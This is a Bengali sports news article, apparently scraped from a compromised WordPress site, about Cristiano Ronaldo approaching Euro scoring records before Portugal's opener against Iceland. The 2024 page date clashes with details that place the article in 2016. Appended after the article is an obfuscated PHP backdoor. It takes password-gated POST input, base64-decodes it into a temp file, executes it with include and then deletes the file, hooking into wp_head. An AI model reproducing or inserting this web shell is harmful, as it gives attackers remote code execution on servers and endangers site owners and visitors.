সোমবার, ১৭ই জুন, ২০২৪ খ্রিস্টাব্দ ৩রা আষাঢ়, ১৪৩১ বঙ্গাব্দ

অনন্য রেকর্ডের সামনে রোনালদো

 

স্পোর্টস ডেস্ক :ফুটবলে ব্যক্তিগত প্রায় সব পুরস্কার জিতেছেন। তিনবার ফিফা ব্যালন ডি’অর জয়ের পাশাপাশি ক্লাব ফুটবলে মৌসুমে একাধিকবার ইউরোপের সবচেয়ে বেশি গোলের কৃতিত্ব দেখিয়েছেন। ম্যানচেস্টার ইউনাইটেড ও রিয়াল মাদ্রিদের হয়ে জিতেছেন ইউয়েফা চ্যাম্পিয়ন্স লীগের তিন শিরোপা। তবে নিজ দেশ পর্তুগালকে এখন পর্যন্ত বড় কোনো শিরোপা জেতাতে পারেননি ক্রিস্টিয়ানো রোনালদো। দলীয় কোনো শিরোপা না জিতলেও ব্যক্তিগত নৈপুণ্যে দেশের হয়েও উজ্জ্বল রোনালদো। দেশের হয়ে সর্বোচ্চ ৫৮ গোলের রেকর্ড এখন তার দখলে। আর এবার তিনি আছেন অনন্য এক রেকর্ডের সামনে। ইউরোপিয়ান চ্যাম্পিয়নশিপ শুরু হয়েছে গতকাল থেকে। রোনালদোর পর্তুগাল নিজেদের প্রথম ম্যাচে মঙ্গলবার মাঠে নামবে আইসল্যান্ডের বিপক্ষে। পর্তুগালের অধিনায়ক রোনালদো এবারের আসরে গোল করলে প্রথম খেলোয়াড় হিসেবে ইউরো কাপের চার আসরে গোল করার নয়া রেকর্ডের সামনে তিনি।

ronaldo

 

 

এছাড়া তিনি আছেন ইউরো কাপে সবচেয়ে বেশি গোলের রেকর্ডের সামনে। ২০০৪, ২০০৮ ও ২০১২- এই তিন আসরে রোনালদো করেন মোট ৬ গোল। ইতিহাসে ইউরোতে সর্বোচ্চ ৯ গোলের রেকর্ড ফ্রান্সের মিশেল প্লাতিনির। তাকে স্পর্শ করতে রোনালদোর আর তিন গোল দূরে। এবার সে রেকর্ডটা করে ফেলতে পারেন ফর্মের তুঙ্গে থাকা রোনালদো। ২০০৪ সালে পর্তুগালের হয়ে আন্তর্জাতিক ফুটবলে অভিষেক হয় রোনালদোর। ওই বছর ইউরোতে দুর্দান্ত করে পর্তুগাল। লুইস ফিগোর নেতৃত্বের দলটি ফাইনালে ওঠে। কিন্তু শিরোপার লড়াইয়ে গ্রিসের কাছে অপ্রত্যাশিতভাবে হেরে যায় তারা। ওই টুর্নামেন্টে তরুণ রোনালদো করেন ২ গোল। ৪ বছর বাদে ২০০৮ সালে রোনালদো তখন ফর্মের তুঙ্গে। ইংলিশ ক্লাব ম্যানচেস্টার ইউনাইটেডকে ইউয়েফা চ্যাম্পিয়ন্স লীগের শিরোপা জেতানোর এক মাসের মধ্যে তিনি ইউরো খেলতে যান অস্ট্রিয়া-সুইজারল্যান্ডে। সেবার তার দল কোয়ার্টার ফাইনালে জার্মানির কাছে হেরে বিদায় নেয়।

 

 

 

ওই আসরে রোনালদো মাত্র এক গোল করেন। সর্বশেষ ২০১২ আসরে রোনালদো খেলেন স্প্যানিশ ক্লাব রিয়াল মাদ্রিদে। ক্লাবটির হয়ে তিনি ওই মৌসুমে ৬০ গোল করেন। রিয়াল মাদ্রিদ জেতে স্প্যানিশ লা-লিগার শিরোপা। রোনালদোর নৈপুণ্যে সেবার সেমিফাইনালে খেলে পর্তুগাল। কিন্তু ফাইনালে ওঠার লড়াইয়ে শেষ চারে তারা স্পেনের কাছে ৫-৩ টাইব্রেকারে হেরে যায়। এবারের ইউরোর আগেও দুর্দান্ত ফর্মে রোনালদো। রিয়াল মাদ্রিদকে জিতিয়েছেন ইউয়েফা চ্যাম্পিয়ন্স লীগের শিরোপা। পর্তুগালের এ উইঙ্গারের বয়স এখন ৩১ বছর। মনে করা হচ্ছে, এটাই তার শেষ ইউরো। দেশকে ইউরোর শিরোপা জেতানোর শেষ সুযোগ তার। একই সঙ্গে টুর্নামেন্টের সর্বোচ্চ গোলদাতা ও প্রথম খেলোয়াড় হিসেবে চার আসরে গোলের রেকর্ড গড়ার সুযোগ তার সামনে।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}